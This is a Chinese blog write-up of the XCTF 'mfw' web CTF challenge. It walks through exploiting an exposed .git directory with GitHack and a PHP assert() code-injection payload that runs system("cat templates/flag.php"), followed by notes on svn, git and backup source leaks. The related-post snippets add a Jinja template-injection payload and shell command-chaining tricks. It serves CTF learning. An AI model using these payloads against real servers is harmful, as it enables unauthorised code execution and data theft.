XCTF攻防世界web进阶练习_ 5_mfw

最新推荐文章于 2025-07-04 23:35:55 发布
原创 最新推荐文章于 2025-07-04 23:35:55 发布 · 3.5k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文围绕XCTF攻防世界web进阶练习mfw题目展开,通过分析网站URL和源码,利用Git源码泄露漏洞获取网站源码,构造URL得到flag。同时介绍了三种源码泄露情况,包括svn、git源码泄露及网站源码压缩备份泄露,并给出示例和工具。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XCTF攻防世界web进阶练习—mfw

题目

题目为mfw,没有任何提示。
直接打开题目,是一个网站
在这里插入图片描述
大概浏览一下其中的内容,看到其中url变化其实只是get的参数的变化
查看它的源码,看到有一个?page=flag,flag应该在这个页面里面
在这里插入图片描述
但是进入这个页面发现是空的
注意到有这样一个页面,说道用到了Git,想到是否可能和Git源码泄露有关
在这里插入图片描述
于是试一下http://111.198.29.45:33750/.git这个url,果然有猫腻
在这里插入图片描述
利用.git源码泄漏漏洞,使用githack(GitHack.py http://www.example.com/.git/)得到网站源码
注意:Githack要用python2来运行

在这里插入图片描述
得到源码后直接看flag.php,但是没啥有价值的东西
在这里插入图片描述
大概浏览一下所有的php文件,发现只有index.php有可能有切入口
于是分析index.php

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}
       //以get方式获得一个page变量,如果没有,则设置为home
           
$file = "templates/" . $page . ".php";
	//将page变量拼接成一个templates下的php文件,设置为变量file

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
        //判断file中是否有" .. ",如果有则直接退出
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!")

?>

其中assert()函数会将括号中的字符当成代码来执行,并返回true或false。
strpos()函数会返回字符串第一次出现的位置,如果没有找到则返回False
这里的两个assert看起来没什么破绽,但是用到了上面的file变量
于是重心就放在file变量中,发现file变量是用我们输入的page变量拼接而成的,而且没有任何的过滤,看到了胜利的曙光!
我们可以在这段输入的字符中插入system函数来执行系统命令。

$file = "templates/" . $page . ".php";

assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

注意到调用file时用的单引号和括号来限制file的范围。
于是可以构造url为page=abc') or system("cat templates/flag.php");//
(这里是网上找的大佬的url,因为自己实在是太菜)
因为在strpos中只传入了abc,所以其肯定返回false,在利用or让其执行system函数,再用" // "将后面的语句注释掉

回车,F12看看源码,得到flag!
在这里插入图片描述

关于源码泄露

1.svn 源码泄露

SVN(subversion)是源代码版本管理软件。在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。但一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境,黑客可以借助其中包含的用于版本信息追踪的‘entries’文件,逐步摸清站点结构。
例:http://127.0.0.1/.svn/entries
工具:Seay-Svn

2.git 源码泄露

在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。在发布代码的时候,把.git这个目录没有删除,直接发布了。使用这个文件,可以用来恢复源代码。
例:http://127.0.0.1/.git/config
工具:GitHack

3. 网站源码压缩备份泄露

一般网站管理员在日常维护中,总会把网站源码给备份一下,防止网站出现问题时,能马上的恢复使用,不过一般的管理员安全意识不高,在备份的时候,会使用一些常见的压缩备份名,而且不光使用常见的备份名字,大部分的管理还会把备份好的源码直接放在网站根目录里

 常见备份文件后缀名:
 .rar
.zip
.7z
.tar.gz
.bak
.swp
.txt
.html

还有更多的源码泄露参考:
https://www.secpulse.com/archives/55286.html
https://www.freebuf.com/sectool/66096.html
http://www.s2.sshz.org/post/source-code-leak/

攻防世界web进阶mfw
gongjingege的博客
07-27 451
打开链接 看源代码 以为在?page=flag里,啥也没 到处点点,在about页面里发现了.git 泄露 于是在url后.git/ 或者dirsearch扫一下 然后GitHack下载源码 flag.php里没有,但是index.php里有要求,可以构造payload 代码审计,参考大佬的wp,payload:?page=abc’) or system(“cat templates/flag.php”);// 查看源代码,得到flag 知识点:工具:dirsearch-master,GitHa
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1195
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
XCTF 攻防世界 web 高手进阶
qq_44657899的博客
12-04 3270
command_execution 题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 题目相关知识点: 一,windows系统有哪些命令行拼接符。 A&B 简单的拼接,A与B同时执行。 A&&B A执行成功,则执行B。 A|B A命令的输出作为B命令的输入执行。 A||B 若A命令执行失败,则执行B命令。 二,fi...
攻防世界-PHP2
最新发布
weixin_65725423的博客
07-04 775
摘要:解题过程发现phps文件可查看PHP源代码,通过分析代码发现需对"admin"进行双重URL编码才能获取flag。知识点包括:phps文件用于展示PHP源码,浏览器会自动对URL编码进行一次解码,因此需要二次编码绕过服务器验证。最终对"admin"两次编码后成功获取flag。解题方法可加入御剑扫描配置文件提高效率。
XCTF 攻防世界WEB 高手进阶mfw
weixin_45844670的博客
09-03 399
进入环境,看到about界面用到的技术git 第一时间可以想到git泄露 使用githack扫描一下 python GitHack,py 网址/.git 可以看到index.php 和templates文件夹,templates文件夹是存放网页模板信息的 都已经显示在网页中 可惜flag.php没有内容 查看index.php 发现有猫腻 <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "ho
XCTF攻防世界web进阶练习_ 5_bug
silence1_的博客
09-22 1531
XCTF攻防世界web进阶练习—bug 题目 题目名字是bug 进入题目是一个登录界面 这里提供了注册和找回密码的功能,简单测试了一下sql注入,无果。 联想到题目名字是bug,应该和网站逻辑问题有关。 注册一个账号,这里我注册为admins password 注册好之后当然是登录啦,登录进去之后有几个功能。其中值的注意的是manage和change pwd 发现manage要管理员权限,...
攻防世界 Web高手进阶mfw
feng的博客
09-05 581
这是涉及git泄露,PHP危险函数中的assert()函数,以及代码审计的一个题目。
[XCTF]攻防世界Web_python_template_injection模板注入
qq_37301470的博客
11-20 3655
模板注入 在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload: http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
攻防世界 Crypto进阶 Handicraft_RSA
qtL0ng的博客
06-02 1447
1、题目 #!/usr/bin/python from Crypto.Util.number import * from Crypto.PublicKey import RSA from secret import s, FLAG def gen_prime(s): while True: r = getPrime(s) #生成一个素数r R = [r] #将r转换为列表 t = int(5 * s / 2) + 1 for i i
攻防世界 web高手进阶区 10分题 Background_Management_System
闵行小鱼塘
10-21 1153
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Background_Management_System的writeup
攻防世界web进阶mfw详解
hxhxhxhxx的博客
07-31 648
攻防世界web进阶mfw详解题目解法方法二assertstrposfile_exists() 题目 解法 当我们看到about的时候,看到使用了git 我们猜测有git源码泄露 http://220.249.52.133:57869/.git/ githack下载发现flag.php <?php // TODO // $FLAG = ''; ?> 并没有发现什么 那么我们对index.php进行审计看看能发现什么 <?php if (isset($_GET['page'])
攻防世界XCTFmfw
末初 · mochu7
03-07 520
发现使用git进行网站部署,尝试 /.git查看是否git泄漏。 git泄漏 当前大量开发人员使用git进行版本控制,对站点自动部署。 如果配置不当,可能会将.git文件夹直接部署到线上环境,这就引起了git泄露漏洞。 GitHack 项目地址:https://github.com/lijiejie/GitHack GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,还...
XCTF WEB mfw
A_dmin的博客
06-03 4582
XCTF WEB mfw 比赛打自闭了,需要好好学习 打开网页看见(猜测git源码泄露): 在URL后面加上./git发现: 使用脚本,在Linux环境中: pip install requests git clone https://github.com/wangyihang/GitHacker.git python GitHacker.py [Website] 得到源码: flag...
XCTF-高手进阶区:mfw
1stPeak's Blog
06-13 4199
XCTF-高手进阶区-第三题:mfw 目标: 学习git泄露有关知识: 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞 会简单构造php的payload 了解urlencode Writeup (1)我们在http://111.198.29.45:46634/?page=about页面看到如下图...
XCTF-攻防世界CTF平台-Web类——19、mfw(.Git源代码泄露、php的assert断言)
Onlyone_1314的博客
12-11 3999
打开题目地址: 是一个作者用php写的网站 在About页面,作者介绍他使用了Git、PHP、Bootstrap 之后我们查看页面源代码: 在每个页面的注释里都有一个隐藏页面:?page=flag,提示flag应该就在这个页面。我们也注意到home、contact和about页面都是通过访问index.php页面以GET方式的page参数来跳转页面的:?page=home、?page=contact、?page=about。 所以我们直接访问: http://111.200.241.244:60434
攻防世界-mfw-(详细操作)做题笔记
qq_43715020的博客
06-16 5584
攻防世界-mfw-(详细操作)做题笔记
攻防世界】PHP2
m0_74979597的博客
07-10 4301
又因为编码后参数%61dmin中存在特殊字符%,浏览器会自动进行URL解码,所以我们对%进行编码:%25。网站是由前端,后端,数据库,服务器,域名,其他组件(图像、视频、第三方API、安全认证等)组成;总之:可能考察php脚本在服务器上运行,php脚本文件的经典路径;会在服务器上执行,生成动态的HTML页面,然后将页面发送给用户的浏览器进行显示。urldecode是PHP函数,解码经过URL编码的字符串,解码回原始的形式;果然在这里,通常不可能访问到一般网站的脚本路径,更不用说是脚本的源代码;
攻防世界—PHP 2
qq_74276395的博客
02-24 1129
3、通过打开bp中的decoder输入两次admin,encode得到%2、输入index.phps,然后进行代码审计。1、打开题目得到如下如图。
XCTF-WEB进阶-fakebook
02-28
### XCTF WEB进阶 Fakebook 解题报告 #### 源码分析 Fakebook 类似于社交网络平台,在此环境中存在多个功能模块,包括但不限于用户注册、登录以及个人信息管理等功能。通过查看源代码发现,该应用可能存在多种安全漏洞。 对于假想的 `fakebook` 平台而言,其核心逻辑通常围绕着用户的会话管理和数据交互展开。假设存在如下简化版 PHP 伪代码表示部分关键业务流程: ```php <?php class User { public $username; public $password; function login($input_username, $input_password){ // 存在一个潜在的安全隐患:未对输入做严格验证 if ($this->username === $input_username && md5($input_password) === $this->password){ $_SESSION['logged_in'] = true; return "Login successful"; } return "Invalid credentials"; } } ?> ``` 上述代码片段展示了用户认证过程中可能存在的安全隐患——使用弱哈希算法 MD5 对密码进行了处理[^1]。 #### 安全问题剖析 基于以上描述可以推测出几个主要攻击面: - **弱哈希函数**:MD5 已经被证明不再适合用于保护敏感信息,因为它容易受到碰撞攻击的影响。 - **缺乏输入过滤机制**:未能有效防止恶意字符进入系统内部,这可能导致 SQL 注入或其他类型的注入攻击发生。 - **不恰当的错误消息返回**:当用户名或密码错误时给出的具体提示可能会帮助攻击者缩小猜测范围。 #### 利用技巧 针对这些弱点,参赛选手可以从以下几个方面入手尝试突破并解决问题: - 尝试暴力破解或者彩虹表查找已知 MD5 值对应的原始字符串; - 测试是否存在其他形式的数据注入风险点,比如 URL 参数、POST 请求体内的字段等位置; - 探索是否有任何地方暴露出过多调试信息给外部访问者利用; 成功完成挑战后一般可以获得 flag 或者进一步的操作权限作为奖励。 #### 复现过程 为了模拟真实的渗透测试场景,建议按照以下方式构建实验环境来进行练习: 1. 构建一个类似的 Web 应用程序框架,确保其中包含了所有必要的组件和服务依赖关系; 2. 实施相应的防护措施来抵御常见的Web 攻击手段,如 XSS 和 CSRF 等; 3. 使用工具辅助自动化执行某些特定任务,例如 Hydra 可以用来实施字典攻击尝试登陆接口; 4. 记录每一步操作细节以便后续总结经验教训,并分享给社区成员共同学习进步。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值